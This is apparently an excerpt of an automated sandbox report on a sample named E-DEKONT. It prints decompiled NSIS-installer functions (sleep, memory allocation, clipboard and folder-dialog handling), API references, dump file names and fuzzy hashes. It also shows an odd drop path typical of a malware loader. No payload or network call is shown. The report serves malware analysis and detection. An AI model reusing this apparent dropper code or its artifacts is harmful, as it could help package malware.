                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                              • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                              • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                              • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                              • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
                                                                            • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                                            • Opcode Fuzzy Hash: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
                                                                            • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                            0x004014d7
                                                                            0x004014d8
                                                                            0x004014e1
                                                                            0x004014e4
                                                                            0x004014e8
                                                                            0x004014e8
                                                                            0x004014ea
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
                                                                            • Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
                                                                            • Opcode Fuzzy Hash: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
                                                                            • Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                                            0x10001225
                                                                            0x1000122b

                                                                            APIs
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AllocGlobal
                                                                            • String ID:
                                                                            • API String ID: 3761449716-0
                                                                            • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                            • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                            • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                            • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 95%
                                                                            			E00405425(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ec4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004053B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004062A4(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d248;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433eac == _t156) {
							ShowWindow( *0x434ee8, 8);
							if( *0x434f8c == _t156) {
								E004052E6( *((intOrPtr*)( *0x42c220 + 0x34)), _t156);
							}
							E004041F0(_t171);
							goto L25;
						}
						 *0x42ba18 = 2;
						E004041F0(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040427E(_a8, _a12, _a16);
						}
						ShowWindow( *0x433eb0, _t156);
						ShowWindow(_t169, 8);
						E0040424C(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434ef4;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433eb0 = GetDlgItem(_a4, 0x403);
				 *0x433ea8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ec4 = _t134;
				_v8 = _t134;
				E0040424C( *0x433eb0);
				 *0x433eb4 = E00404B83(4);
				 *0x433ecc = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404217(_a4);
				if(( *0x434efc & 0x00000003) != 0) {
					ShowWindow( *0x433eb0, _t156);
					if(( *0x434efc & 0x00000002) != 0) {
						 *0x433eb0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040424C( *0x433ea8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434efc & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                            0x0040542d
                                                                            0x00405433
                                                                            0x0040543d
                                                                            0x00405440
                                                                            0x004055d6
                                                                            0x004055fa
                                                                            0x004055fa
                                                                            0x0040560d
                                                                            0x0040562b
                                                                            0x0040562d
                                                                            0x00405635
                                                                            0x0040568b
                                                                            0x0040568f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405691
                                                                            0x00405697
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004056a1
                                                                            0x004056a9
                                                                            0x004056ac
                                                                            0x004057ae
                                                                            0x00000000
                                                                            0x004057ae
                                                                            0x004056bb
                                                                            0x004056c6
                                                                            0x004056cf
                                                                            0x004056da
                                                                            0x004056dd
                                                                            0x004056e6
                                                                            0x004056ec
                                                                            0x004056ef
                                                                            0x004056ef
                                                                            0x00405707
                                                                            0x00405710
                                                                            0x00405713
                                                                            0x0040571a
                                                                            0x00405721
                                                                            0x00405729
                                                                            0x00405729
                                                                            0x00405740
                                                                            0x00405740
                                                                            0x00405747
                                                                            0x0040574d
                                                                            0x00405759
                                                                            0x00405760
                                                                            0x00405769
                                                                            0x0040576b
                                                                            0x0040576e
                                                                            0x0040577d
                                                                            0x00405780
                                                                            0x00405786
                                                                            0x00405787
                                                                            0x0040578d
                                                                            0x0040578e
                                                                            0x0040578f
                                                                            0x00405797
                                                                            0x004057a2
                                                                            0x004057a8
                                                                            0x004057a8
                                                                            0x00000000
                                                                            0x00405707
                                                                            0x0040563d
                                                                            0x0040566d
                                                                            0x00405675
                                                                            0x00405680
                                                                            0x00405680
                                                                            0x00405686
                                                                            0x00000000
                                                                            0x00405686
                                                                            0x00405641
                                                                            0x0040564b
                                                                            0x00000000
                                                                            0x0040560f
                                                                            0x00405615
                                                                            0x00405650
                                                                            0x00000000
                                                                            0x00405659
                                                                            0x0040561e
                                                                            0x00405623
                                                                            0x00405626
                                                                            0x00000000
                                                                            0x00405626
                                                                            0x0040560d
                                                                            0x00405446
                                                                            0x0040544a
                                                                            0x00405452
                                                                            0x00405456
                                                                            0x00405459
                                                                            0x0040545c
                                                                            0x0040545f
                                                                            0x00405462
                                                                            0x00405463
                                                                            0x00405464
                                                                            0x0040547d
                                                                            0x00405480
                                                                            0x0040548a
                                                                            0x00405499
                                                                            0x004054a1
                                                                            0x004054a9
                                                                            0x004054ae
                                                                            0x004054b1
                                                                            0x004054bd
                                                                            0x004054c6
                                                                            0x004054cf
                                                                            0x004054f1
                                                                            0x004054f7
                                                                            0x00405508
                                                                            0x0040550d
                                                                            0x0040551b
                                                                            0x00405529
                                                                            0x00405529
                                                                            0x0040552e
                                                                            0x0040553c
                                                                            0x0040553c
                                                                            0x00405541
                                                                            0x00405544
                                                                            0x00405549
                                                                            0x00405555
                                                                            0x0040555e
                                                                            0x0040556b
                                                                            0x0040557a
                                                                            0x0040556d
                                                                            0x00405572
                                                                            0x00405572
                                                                            0x00405586
                                                                            0x00405586
                                                                            0x0040559a
                                                                            0x004055a3
                                                                            0x004055ac
                                                                            0x004055bc
                                                                            0x004055c8
                                                                            0x004055c8
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                            • GetClientRect.USER32(?,?), ref: 004054CF
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                              • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                                            • ShowWindow.USER32(00000000), ref: 0040561E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405623
                                                                            • ShowWindow.USER32(00000008), ref: 0040566D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                            • CreatePopupMenu.USER32 ref: 004056B2
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                            • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                            • OpenClipboard.USER32(00000000), ref: 00405747
                                                                            • EmptyClipboard.USER32 ref: 0040574D
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                            • CloseClipboard.USER32 ref: 004057A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                            • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                            • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                            • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E004046E6(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c220;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x435000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004058C8(0x3fb, _t146);
					E00406516(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058C8(0x3fb, _t146);
							if(E00405C5B(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406282(0x42b218, _t146);
							_t87 = E0040665C(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406282(0x42b218, _t146);
								_t89 = E00405BFE(0x42b218);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b218,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b218) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b218,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B9F(0x42b218);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b218) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B83(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t158) {
									E00404B6B(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b208);
									} else {
										E00404AA2(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404239(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d238 == _t158) {
									E0040463F();
								}
								 *0x42d238 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d248;
							_v60 = E00404A3C;
							_v56 = _t146;
							_v68 = E004062A4(_t146, 0x42d248, _t167, 0x42ba20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B53(_t146);
								_t125 =  *((intOrPtr*)( *0x434ef4 + 0x11c));
								if( *((intOrPtr*)( *0x434ef4 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") {
									E004062A4(_t146, 0x42d248, _t167, 0, _t125);
									if(lstrcmpiW(0x432e80, 0x42d248) != 0) {
										lstrcatW(_t146, 0x432e80);
									}
								}
								 *0x42d238 =  *0x42d238 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BCA(_t146) != 0 && E00405BFE(_t146) == 0) {
						E00405B53(_t146);
					}
					 *0x433eb8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404217(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404217(_t167);
					E0040424C(_t166);
					_t138 = E0040665C(7);
					if(_t138 == 0) {
						L53:
						return E0040427E(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                            0x004046e6
                                                                            0x004046ec
                                                                            0x004046f2
                                                                            0x004046ff
                                                                            0x0040470d
                                                                            0x00404710
                                                                            0x00404718
                                                                            0x0040471e
                                                                            0x0040471e
                                                                            0x0040472a
                                                                            0x0040472d
                                                                            0x0040479b
                                                                            0x004047a2
                                                                            0x00404879
                                                                            0x00404880
                                                                            0x0040488f
                                                                            0x0040488f
                                                                            0x00404893
                                                                            0x0040489d
                                                                            0x004048aa
                                                                            0x004048ac
                                                                            0x004048ac
                                                                            0x004048ba
                                                                            0x004048c1
                                                                            0x004048c8
                                                                            0x004048cb
                                                                            0x00404907
                                                                            0x00404909
                                                                            0x0040490f
                                                                            0x00404914
                                                                            0x00404918
                                                                            0x0040491a
                                                                            0x0040491a
                                                                            0x00404936
                                                                            0x00000000
                                                                            0x00404938
                                                                            0x0040493b
                                                                            0x00404949
                                                                            0x0040494f
                                                                            0x00404950
                                                                            0x00404953
                                                                            0x00404956
                                                                            0x00000000
                                                                            0x00404956
                                                                            0x004048cd
                                                                            0x004048cf
                                                                            0x004048d3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004048d5
                                                                            0x004048d5
                                                                            0x004048e2
                                                                            0x004048e7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004048eb
                                                                            0x004048ed
                                                                            0x004048ed
                                                                            0x004048f6
                                                                            0x004048f8
                                                                            0x004048fd
                                                                            0x00404900
                                                                            0x00404905
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404905
                                                                            0x00404962
                                                                            0x0040496c
                                                                            0x0040496f
                                                                            0x00404972
                                                                            0x00404979
                                                                            0x00404979
                                                                            0x0040497b
                                                                            0x0040497b
                                                                            0x00404980
                                                                            0x00404982
                                                                            0x0040498a
                                                                            0x00404991
                                                                            0x00404993
                                                                            0x0040499e
                                                                            0x0040499e
                                                                            0x00404993
                                                                            0x004049ae
                                                                            0x004049b8
                                                                            0x004049c0
                                                                            0x004049db
                                                                            0x004049c2
                                                                            0x004049cb
                                                                            0x004049cb
                                                                            0x004049c0
                                                                            0x004049e0
                                                                            0x004049e5
                                                                            0x004049ea
                                                                            0x004049f3
                                                                            0x004049f3
                                                                            0x004049fc
                                                                            0x004049fe
                                                                            0x004049fe
                                                                            0x00404a0a
                                                                            0x00404a12
                                                                            0x00404a1c
                                                                            0x00404a1c
                                                                            0x00404a21
                                                                            0x00000000
                                                                            0x00404a21
                                                                            0x004048cb
                                                                            0x00404882
                                                                            0x00404889
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404889
                                                                            0x004047a8
                                                                            0x004047b1
                                                                            0x004047cb
                                                                            0x004047d0
                                                                            0x004047da
                                                                            0x004047e1
                                                                            0x004047ed
